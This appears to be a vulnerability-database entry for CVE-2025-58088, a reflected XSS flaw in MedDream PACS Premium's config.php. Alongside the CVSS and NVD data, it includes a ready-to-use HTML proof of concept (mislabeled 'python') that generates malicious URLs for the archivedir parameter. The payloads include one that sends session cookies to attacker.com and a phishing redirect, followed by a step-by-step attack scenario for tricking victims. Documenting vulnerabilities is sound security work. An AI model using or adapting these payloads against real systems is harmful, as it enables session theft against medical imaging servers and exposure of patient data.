CVE-2025-58088

Description

Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities.This vulnerability affects the archivedir parameter.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:meddream:pacs_server:7.3.6.870:*:*:*:premium:*:*:* - VULNERABLE

MedDream PACS Premium 7.3.6.870及之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-58088 PoC - Reflected XSS in MedDream PACS Premium config.php -->
<!-- Affected Parameter: archivedir -->
<!-- Replace TARGET_URL with the actual MedDream PACS server URL -->

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-58088 PoC</title>
</head>
<body>
    <h1>CVE-2025-58088 - Reflected XSS PoC</h1>
    <p>Target: MedDream PACS Premium <= 7.3.6.870</p>
    <p>Vulnerable Parameter: archivedir</p>
    
    <h2>Malicious URL:</h2>
    <pre id="malicious-url"></pre>
    
    <h2>Test Cases:</h2>
    <ul>
        <li><a href="#" onclick="testXSS('alert')">Test Alert Dialog</a></li>
        <li><a href="#" onclick="testXSS('cookie')">Test Cookie Theft</a></li>
        <li><a href="#" onclick="testXSS('redirect')">Test Redirect</a></li>
    </ul>
    
    <script>
        const targetUrl = 'TARGET_URL/config.php';
        
        function testXSS(type) {
            let payload;
            switch(type) {
                case 'alert':
                    payload = '<script>alert("XSS Vulnerability Confirmed - CVE-2025-58088")<\/script>';
                    break;
                case 'cookie':
                    payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)<\/script>';
                    break;
                case 'redirect':
                    payload = '<script>window.location.href="https://attacker.com/phishing"<\/script>';
                    break;
            }
            const maliciousUrl = `${targetUrl}?archivedir=${encodeURIComponent(payload)}`;
            document.getElementById('malicious-url').textContent = maliciousUrl;
            console.log('Malicious URL:', maliciousUrl);
            alert('Copy this URL to test:\n' + maliciousUrl);
        }
        
        // Display default payload
        const defaultPayload = '<script>alert("CVE-2025-58088")<\/script>';
        document.getElementById('malicious-url').textContent = 
            targetUrl + '?archivedir=' + encodeURIComponent(defaultPayload);
    </script>
    
    <h2>Attack Scenario:</h2>
    <ol>
        <li>Attacker crafts malicious URL with XSS payload in archivedir parameter</li>
        <li>Attacker tricks victim into clicking the malicious link (phishing email, etc.)</li>
        <li>Victim's browser executes the injected JavaScript code</li>
        <li>Attacker steals session cookies or performs other malicious actions</li>
    </ol>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-58088
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-58088
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-58088/
[4] VulDB https://vuldb.com/cve/CVE-2025-58088
[5] https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271
[6] https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-58088", "sourceIdentifier": "[email protected]", "published": "2026-01-20T15:17:04.290", "lastModified": "2026-01-29T15:16:22.827", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities.This vulnerability affects the archivedir parameter."}, {"lang": "es", "value": "Múltiples vulnerabilidades de cross-site scripting (XSS) reflejado existen en la funcionalidad config.PHP de MedDream PACS Premium 7.3.6.870. URLs maliciosas especialmente diseñadas pueden llevar a la ejecución arbitraria de código javascript. Un atacante puede proporcionar una URL diseñada para activar estas vulnerabilidades. Esta vulnerabilidad afecta al parámetro archivedir."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:meddream:pacs_server:7.3.6.870:*:*:*:premium:*:*:*", "matchCriteriaId": "0F239E49-18E8-4DE0-B9B8-C220C3BC0C62"}]}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}